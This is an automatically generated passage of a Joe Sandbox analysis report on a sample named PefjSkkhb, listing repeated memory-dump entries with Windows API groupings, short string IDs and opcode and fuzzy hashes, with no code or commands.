                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHandlePipe
                                                                      • String ID: nul
                                                                      • API String ID: 1424370930-2873401336
                                                                      • Opcode ID: c3b93562104d94dec8cab7a09dad708560240dd78c66e81481d559291ba52c16
                                                                      • Instruction ID: 3ee4a91bc2f1694ef80c57d9eb23e59efb460b2e3058f16c93e32c383d8eb48d
                                                                      • Opcode Fuzzy Hash: c3b93562104d94dec8cab7a09dad708560240dd78c66e81481d559291ba52c16
                                                                      • Instruction Fuzzy Hash: 91215E32A58B5682EB10AF25D014379E3A0FB85B78F904335DA6E867D5DF7EE0448790
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHandlePipe
                                                                      • String ID: nul
                                                                      • API String ID: 1424370930-2873401336
                                                                      • Opcode ID: 0134d29867f6a044a915cc83a074af2c17d8f13ec2a8203597b3b6c722d2df41
                                                                      • Instruction ID: 439d8ad65e25cd504cb74476528cbffe5b119e9eaca9b7f46a13b02f546525a4
                                                                      • Opcode Fuzzy Hash: 0134d29867f6a044a915cc83a074af2c17d8f13ec2a8203597b3b6c722d2df41
                                                                      • Instruction Fuzzy Hash: F9318072A58A4682EB10BF24D424379B3A0FB85B78F900331DA7D867D4CF7EE44587A1
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                      • String ID:
                                                                      • API String ID: 3220332590-0
                                                                      • Opcode ID: d8f977ea4750bda3b048e49f0aa9ed333f17e400e230103ea3ed7eb9902d4993
                                                                      • Instruction ID: 75e33d6d31ab06efd74dd9e63ed2e341cac4cf822f89838e6cfd7d51d8f2de53
                                                                      • Opcode Fuzzy Hash: d8f977ea4750bda3b048e49f0aa9ed333f17e400e230103ea3ed7eb9902d4993
                                                                      • Instruction Fuzzy Hash: 09A1016AA5865386E724AF3185047FDB3A1FF04B28F941435EE1AC7B94EB3DA840D370
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: f$p
                                                                      • API String ID: 3215553584-1290815066
                                                                      • Opcode ID: 6085b62d98b7eab37ce0c073fe453d3efb4bb7d0cdd32a8db3e6aa1a08046eff
                                                                      • Instruction ID: 17bfd5e1b42212960ed1409e3c3a98fee3e7257dbd1544fefd4bd99da35f2b82
                                                                      • Opcode Fuzzy Hash: 6085b62d98b7eab37ce0c073fe453d3efb4bb7d0cdd32a8db3e6aa1a08046eff
                                                                      • Instruction Fuzzy Hash: 47128262E4C16385FB20BF58E048579B651EB90774FDC4232D699C67D8DB3DF5408BA0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                                      • String ID:
                                                                      • API String ID: 3859894641-0
                                                                      • Opcode ID: e8b24930f51ba047eb7d77df0b47a13309a91a72afe8362d3ff3918905f513c3
                                                                      • Instruction ID: 5118118bc7749828a5e84c35dfde1c8c3b5226674fd87eb90aad3b99a876d7b6
                                                                      • Opcode Fuzzy Hash: e8b24930f51ba047eb7d77df0b47a13309a91a72afe8362d3ff3918905f513c3
                                                                      • Instruction Fuzzy Hash: AD717171A8865281EE24BF25D1541BCE3A0FF44BA0F988235DF4E87791DF2CF85187A8
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Filewcscat$FullNamePath$AttributesMoveOperationlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 564229958-0
                                                                      • Opcode ID: 35062434fee54acf94d2c2a036a69dc928caf6f380b06f8f0a879a9cbd16691f
                                                                      • Instruction ID: 35b9c654da93d5b42dcd939a854229caa46f4663843420c93cdb20d89dc229a9
                                                                      • Opcode Fuzzy Hash: 35062434fee54acf94d2c2a036a69dc928caf6f380b06f8f0a879a9cbd16691f
                                                                      • Instruction Fuzzy Hash: 2E519622A58A8295EF20FF24D4402EDA364FF90B94FC40032E64D9779ADFA9F745C790
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %.15g$0x%p$False$True
                                                                      • API String ID: 0-2263619337
                                                                      • Opcode ID: 3df143d41b72c37e8d3401a32f1c040a903f4fba463ccff2488bc58be4e83188
                                                                      • Instruction ID: 27b4419fbef39f58ff895f3ff95f1333d4d30e7c8e84fd1e28aedd82cf436ec4
                                                                      • Opcode Fuzzy Hash: 3df143d41b72c37e8d3401a32f1c040a903f4fba463ccff2488bc58be4e83188
                                                                      • Instruction Fuzzy Hash: DF518132B8DE4685EE20FF69D0441BCA3A5EB44BA8F948531DA0D87799DF39F405C3A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                      • String ID:
                                                                      • API String ID: 2592858361-0
                                                                      • Opcode ID: 55256b84f857a58467b122c2e0110198eeb840c0349577806b29d092c26582af
                                                                      • Instruction ID: 9394edcb7b54b09081513a098b0cb2b9e71477a849a3e9dfe009e3042029ae6e
                                                                      • Opcode Fuzzy Hash: 55256b84f857a58467b122c2e0110198eeb840c0349577806b29d092c26582af
                                                                      • Instruction Fuzzy Hash: B8519C32A08A9286E620BF11D4447B9B760FB45FA4F844235CE6D87B91CF7CF44587A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Window$PerformanceQuery$CounterRectmouse_event$CursorDesktopForegroundFrequencySleep
                                                                      • String ID:
                                                                      • API String ID: 383626216-0
                                                                      • Opcode ID: d42387b76471bac3b8932b653f89b44f129081ac0d9aa200aab0c7b58dfd8027
                                                                      • Instruction ID: 92f9a632a6079d4ffa4d177b37ef51c45adefed1f8cf9514796f0851ec42e649
                                                                      • Opcode Fuzzy Hash: d42387b76471bac3b8932b653f89b44f129081ac0d9aa200aab0c7b58dfd8027
                                                                      • Instruction Fuzzy Hash: CB31CE73B082528BE715EF61D8807ADB3A1FB88758F900235EA1A93B84DF39F5458790
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                      • String ID:
                                                                      • API String ID: 1413079979-0
                                                                      • Opcode ID: e80dfedd3eaf6b84f7bd14bc2d1553c684f5a5893d6eff82682e3bb03b713a55
                                                                      • Instruction ID: 48e2d7099813f487c015ed62f78b70cf8ad5b77713645a9be6290ca0960b555c
                                                                      • Opcode Fuzzy Hash: e80dfedd3eaf6b84f7bd14bc2d1553c684f5a5893d6eff82682e3bb03b713a55
                                                                      • Instruction Fuzzy Hash: A3318E3260CB8586DB609F02E4847AAB3A5FB88FA4F444136DE8D43714DF7DE445CB50
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 2082702847-0
                                                                      • Opcode ID: a458dfd9bfd9b277759dc90733565293cd25b8068806620b860b1285bf48ee5e
                                                                      • Instruction ID: 72fe8366ddec9412bfc4e51a5f3f42d8231680eb90b1d4a0d83f1310557f2466
                                                                      • Opcode Fuzzy Hash: a458dfd9bfd9b277759dc90733565293cd25b8068806620b860b1285bf48ee5e
                                                                      • Instruction Fuzzy Hash: 3321AE21A4DB8281EE15BF68A414279E294AF44FB8F840734DE3D867D4DF3CF44487A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDevice$Release
                                                                      • String ID:
                                                                      • API String ID: 1035833867-0
                                                                      • Opcode ID: db491a3267b275339f548d81dbee8ecebd291c24a581f1a9e6271a89bb132f3c
                                                                      • Instruction ID: f189aab758c0a26e90efd945d2ebfb899d6a0912a98c85e190626e724fc29728
                                                                      • Opcode Fuzzy Hash: db491a3267b275339f548d81dbee8ecebd291c24a581f1a9e6271a89bb132f3c
                                                                      • Instruction Fuzzy Hash: 7A11C635B1870182EB18EF61D80812AB6A1FB88FD5F808139CF0E87B54CF7DE8458780
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                      • String ID:
                                                                      • API String ID: 43455801-0
                                                                      • Opcode ID: cd64bc4caddf1c30f8798d15c9bc183870131294e5ef7b47fced05608eeea06d
                                                                      • Instruction ID: fb9540c1016414f51f394a400f5aae407c76f640c354c81962494b97b69faada
                                                                      • Opcode Fuzzy Hash: cd64bc4caddf1c30f8798d15c9bc183870131294e5ef7b47fced05608eeea06d
                                                                      • Instruction Fuzzy Hash: BA118F31B1869282E714AF15B808B69AB60FB85FA8F985531CF0643B50CFBDB495C790
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual
                                                                      • String ID:
                                                                      • API String ID: 4278518827-0
                                                                      • Opcode ID: d88387182f0ff78ab7778ef1a67cdc330360886ef23228c05630025599c5fb3f
                                                                      • Instruction ID: 561b499fd23b5737ba03c8e7365c94b308650960726a8b4c8bcd57938d122e7d
                                                                      • Opcode Fuzzy Hash: d88387182f0ff78ab7778ef1a67cdc330360886ef23228c05630025599c5fb3f
                                                                      • Instruction Fuzzy Hash: 3011306290A6408BD349DF39DC4811A7BB2FB58F08B948035C3498F365EF79949ACB50
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                      • String ID:
                                                                      • API String ID: 839392675-0
                                                                      • Opcode ID: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
                                                                      • Instruction ID: eafb9080085f651d749fbe7c83c67fb821992b7551386677ad055533ed2e858b
                                                                      • Opcode Fuzzy Hash: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
                                                                      • Instruction Fuzzy Hash: A201887261D75183EB11AF11E804526B351FF89BA5F845034C90A46B14DF7CE0888B40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                      • String ID:
                                                                      • API String ID: 179993514-0
                                                                      • Opcode ID: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
                                                                      • Instruction ID: 95ee46b11be43840d3055c6bc077d754bdeeeebd76a00cdadb676944ee6f66db
                                                                      • Opcode Fuzzy Hash: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
                                                                      • Instruction Fuzzy Hash: FBF03121F1C76143F7516F71A84862AA292BF88B58FC45134D90E82B55DFBCE48586A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                      • String ID:
                                                                      • API String ID: 146765662-0
                                                                      • Opcode ID: d3946954f153790a4c7b3048297fa9f332d93d6b437e3fe9da6548dd2ef4d2ab
                                                                      • Instruction ID: 0f561d1e66d33887fd84ada5e3b073b956e28db5fcff6712e61ce9dfb46007ac
                                                                      • Opcode Fuzzy Hash: d3946954f153790a4c7b3048297fa9f332d93d6b437e3fe9da6548dd2ef4d2ab
                                                                      • Instruction Fuzzy Hash: C1F0C065A18A01C2EB05FF76D85802AA362FF88FB9B845131CD1E86374CFBCE4D58360
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: FreeFromProgTask$BlanketConnectConnection2CreateInitializeInstanceOpenProxyQueryRegistrySecurityValuelstrcmpi
                                                                      • String ID: NULL Pointer assignment
                                                                      • API String ID: 1653399731-2785691316
                                                                      • Opcode ID: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                                      • Instruction ID: 80cc69458d962bcae086e799294db4e6ccab0c9ed8cf554ebbb85f083cb10b1a
                                                                      • Opcode Fuzzy Hash: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                                      • Instruction Fuzzy Hash: 93B19F32B08B458AE710EF65D4401ADB7B0FB847A8F940136EE4D97B98DF38E545CB90
                                                                      APIs
                                                                      • CharLowerBuffW.USER32(?,?,?,?,00000003,00000000,?,00007FF7C0EEBF47), ref: 00007FF7C0EECE29
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharLower
                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                      • API String ID: 2358735015-567219261
                                                                      • Opcode ID: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
                                                                      • Instruction ID: 28dce4f4fee95c77cee403bed3e60854ba157f0a49ff968e0bcf8cccc107fa54
                                                                      • Opcode Fuzzy Hash: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
